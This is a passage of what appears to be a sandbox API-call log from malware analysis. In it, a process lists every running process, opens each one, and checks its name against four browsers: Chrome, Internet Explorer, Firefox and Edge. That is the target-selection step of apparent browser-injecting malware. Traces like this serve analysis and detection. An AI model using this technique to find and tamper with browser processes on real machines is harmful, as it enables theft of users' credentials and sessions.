	[0222.375] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.375] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.376] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.376] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.376] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.377] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x53a4
	[0222.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.377] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.377] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.378] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.378] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x53a8
	[0222.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.379] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.379] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.380] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.380] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.380] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x53ac
	[0222.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.381] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.382] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.382] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.382] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.382] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x53b0
	[0222.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.383] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.384] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.384] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.385] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x53b4
	[0222.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.386] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.386] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.387] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.387] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x53b8
	[0222.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.388] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.388] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.389] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.389] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x53bc
	[0222.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.390] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.390] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.391] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.391] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0222.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x53c0
	[0222.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.392] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0222.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.392] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.392] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0222.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.393] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.393] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x53c4
	[0222.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.394] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.395] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.395] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.396] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0222.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x53c8
	[0222.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.397] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.397] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.397] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.398] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x53cc
	[0222.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.399] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.399] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.400] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.400] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x53d0
	[0222.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.401] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.401] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.402] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.402] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.402] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x53d4
	[0222.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.403] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.403] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.404] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.404] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0222.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x53d8
	[0222.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.405] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0222.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.406] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.406] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0222.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.406] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.406] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0222.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x53dc
	[0222.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.407] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.407] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.408] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.408] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.408] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0222.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x53e0
	[0222.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.409] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0222.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.409] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.410] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0222.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.411] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0222.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0222.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0222.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x53e4
	[0222.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.412] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0222.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.413] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.414] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0222.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.415] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0222.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x53e8
	[0222.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.417] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0222.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.417] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.418] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0222.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.418] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.418] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0222.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x53ec
	[0222.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.419] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0222.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.420] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.420] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0222.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.420] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.421] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0222.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x53f0
	[0222.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0222.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.422] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0222.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.423] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0222.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x53f4
	[0222.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.424] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0222.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.424] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.425] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0222.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.425] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0222.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x53f8
	[0222.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.427] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0222.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.427] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.427] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0222.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.427] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0222.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x53fc
	[0222.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.428] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0222.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.429] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.429] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0222.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.430] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.430] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0222.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5400
	[0222.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.431] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0222.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.431] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.432] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
